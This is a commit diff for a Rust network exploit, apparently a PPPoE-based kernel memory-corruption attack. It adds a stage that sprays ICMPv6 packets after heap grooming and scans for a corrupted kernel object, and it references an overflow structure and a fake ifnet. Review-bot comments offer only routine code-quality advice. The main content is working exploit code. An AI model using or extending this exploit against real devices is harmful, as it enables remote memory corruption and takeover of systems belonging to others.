Add search for corrupted obj
fedebuonco committed Oct 16, 2024
1 parent 3def511 commit f3360db
Showing 3 changed files with 69 additions and 25 deletions.
64 changes: 41 additions & 23 deletions src/exploit/mod.rs
Expand Up @@ -34,17 +34,18 @@ use packet_checking::{
is_padr_packet,
};

use utils::{create_ethernet_channel, listen_for_packet};
use utils::{create_ethernet_channel, listen_for_corruption, listen_for_packet};

use network_structs::{build_overflow_lle, create_fake_ifnet};

// Public re exports
pub use lcp_echo_handler::LcpEchoHandler;
pub struct Exploit {
pub source_mac: [u8; 6],
pub target_mac: [u8; 6],
pub pppoe_softc: u64,
pub source_mac: [u8; 6],
pub host_uniq: [u8; 8],
pub target_ipv6: [u8; 16],
}

impl Exploit {
Expand Down Expand Up @@ -202,15 +203,15 @@ impl Exploit {
// Wait for the ICMPv6 Router Solicitation packet
println!("[+] Waiting for Router Solicitation packet");
let result = listen_for_packet(rx.as_mut(), is_icmpv6_router_sol, None);
let target_ipv6: [u8; 16] = result.unwrap()[22..38].try_into().unwrap();
println!("[+] Target IPv6 {:?}", target_ipv6);
self.target_ipv6 = result.unwrap()[22..38].try_into().unwrap();
println!("[+] Target IPv6 {:?}", self.target_ipv6);
// Enters grooming loop
spray(
tx.as_mut(),
rx.as_mut(),
self.source_mac,
self.target_mac,
target_ipv6,
self.target_ipv6,
);
println!("[+] Heap grooming...done");
}
Expand Down Expand Up @@ -244,14 +245,26 @@ impl Exploit {
self.lcp_negotiation(interface);
self.ipcp_negotiation(interface);

let mut _corrupted = false;
// let mut _corrupted = search_for_corrupted_obj();
let corrupted_source_ipv6: Option<[u8; 16]> = search_for_corrupted_obj(
tx.as_mut(),
rx.as_mut(),
self.source_mac,
self.target_mac,
self.target_ipv6,
);

if !_corrupted {
println!("[-] Scanning for corrupted object...failed. Please retry the exploit.");
process::exit(1);
match corrupted_source_ipv6 {
Some(source_ipv6) => {
println!(
"[+] Scanning for corrupted object...found {:x?}",
source_ipv6
);
}
None => {
println!("[-] Scanning for corrupted object...failed. Please retry the exploit.");
process::exit(1);
}
}
println!("[+] Scanning for corrupted object...found"); // TODO add the found to the print
}
}

Expand Down Expand Up @@ -321,9 +334,12 @@ fn search_for_corrupted_obj(
source_mac: [u8; 6],
target_mac: [u8; 6],
target_v6: [u8; 16],
) -> bool {
) -> Option<[u8; 16]> {
for i in (0..constants::SPRAY_NUM).rev() {
println!("[+] Heap Grooming at {:?}%", 100 * i / constants::SPRAY_NUM);
println!(
"[+]Search for corrupted object at {:?}%",
100 * i / constants::SPRAY_NUM
);
if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
println!("[-]HOLE");
continue;
Expand All @@ -337,17 +353,19 @@ fn search_for_corrupted_obj(
let _result = tx
.send_to(icmpv6_req.as_slice(), None)
.expect("[-] Failed to send icmpv6");

let _result = listen_for_packet(rx, is_icmpv6_nd_ns, None);
// self.s.send(
// Ether(src=self.source_mac, dst=self.target_mac) /
// IPv6(src=source_ipv6, dst=self.target_ipv6) /
// ICMPv6ND_NA(tgt=source_ipv6, S=1) /
// ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))

//TODO return corr yes or no
// Listen for packet if echo reply break,else if neighboard solicitation then corrupted
let currupted = listen_for_corruption(rx);
if !currupted {
return None;
}
let icmpv6_adv = create_icmpv6_adv(source_mac, target_mac, source_v6, target_v6);
// Send the request
let _result = tx
.send_to(icmpv6_adv.as_slice(), None)
.expect("[-] Failed to send icmpv6adv");
return Some(source_v6);
}
true
None
}

fn spray(
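Review bot: In `search_for_corrupted_obj` the value from `listen_for_corruption(rx)` is a bare `bool`, so the `return None` under `if !currupted` fires both when an echo reply arrived for the candidate and when the helper's 30 s deadline expired with no frame at all, and the caller's `"[-] Scanning for corrupted object...failed. Please retry the exploit."` reports both as the same failure, which hides the one fact a user needs when troubleshooting (no reply versus a normal reply). Returning a small enum from the helper (e.g. `Reply`, `Solicitation`, `Timeout`) and matching on it here keeps the control flow unchanged while letting the `None` arm say which case occurred; the same change applies to the helper in src/exploit/utils.rs. The local `currupted` should read `corrupted`, and the in-loop comment "Listen for packet if echo reply break,else if neighboard solicitation then corrupted" states the intent more clearly than the code, so keep it as a spell-checked one-line `//` above the call. The function's signature is in the hunk header and its body spans this hunk and the preceding one, so the start of the loop body is not visible here.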
25 changes: 25 additions & 0 deletions src/exploit/utils.rs
@@ -1,3 +1,4 @@
use super::packet_checking::{is_icmpv6_echo_reply, is_icmpv6_nd_ns};
use pnet::datalink::Channel::Ethernet;
use pnet::datalink::Config;
use pnet::datalink::{self, DataLinkReceiver, DataLinkSender, NetworkInterface};
Expand Down Expand Up @@ -48,3 +49,27 @@ where
thread::sleep(Duration::from_millis(10));
}
}

pub fn listen_for_corruption(rx: &mut dyn DataLinkReceiver) -> bool {
let timeout = Duration::from_secs(30);
let start_time = Instant::now();
loop {
// Check if timeout has passed
if start_time.elapsed() >= timeout {
return false;
}

match rx.next() {
Ok(packet) => {
if is_icmpv6_echo_reply(packet) {
return false;
} else if is_icmpv6_nd_ns(packet) {
return true;
}
}
Err(e) => {
panic!("An error occurred while reading a packet: {}", e);
}
}
}
}
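Review bot: The deadline in `listen_for_corruption` is only tested between returns of `rx.next()`, and that call blocks until a frame arrives; unless the channel was opened with a `read_timeout` in its `Config` (the channel setup is outside this hunk), a quiet link keeps the loop inside `rx.next()` indefinitely and `false` is never returned at 30 s. Either document that precondition on this new `pub fn`, e.g. `/// Requires `rx` to have been opened with a read timeout; the 30 s deadline is only checked between received frames.`, or pass the remaining time to the receiver explicitly. The `Err` arm panics on any receive error, which aborts the whole run where returning `false` with the error logged would let the caller print its existing retry message instead. The hard-coded `Duration::from_secs(30)` would also read better as a named constant alongside the module's other timing values, or as a parameter.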
5 changes: 3 additions & 2 deletions src/main.rs
Expand Up @@ -15,10 +15,11 @@ fn run_exploit(interface_name: String) {
let interface = interfaces.into_iter().find(interface_names_match).unwrap();
// Exploit
let mut expl = Exploit {
source_mac: [0, 0, 0, 0, 0, 0],
target_mac: [0, 0, 0, 0, 0, 0],
pppoe_softc: 0,
source_mac: [0, 0, 0, 0, 0, 0],
host_uniq: [0, 0, 0, 0, 0, 0, 0, 0],
target_ipv6: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
};
// LCP
let mut handler = exploit::LcpEchoHandler::new(&interface);
Expand All @@ -28,7 +29,7 @@ fn run_exploit(interface_name: String) {
expl.ppp_negotiation(&interface);
expl.lcp_negotiation(&interface);
expl.ipcp_negotiation(&interface);
println!("[*] Initial Negotiations Done...");
println!("[*] Initial Negotiations Done... Wait for interface to be ready");
println!("[*] Starting Heap Grooming...");
expl.heap_grooming(&interface);
println!("[*] STAGE 1: Memory corruption");
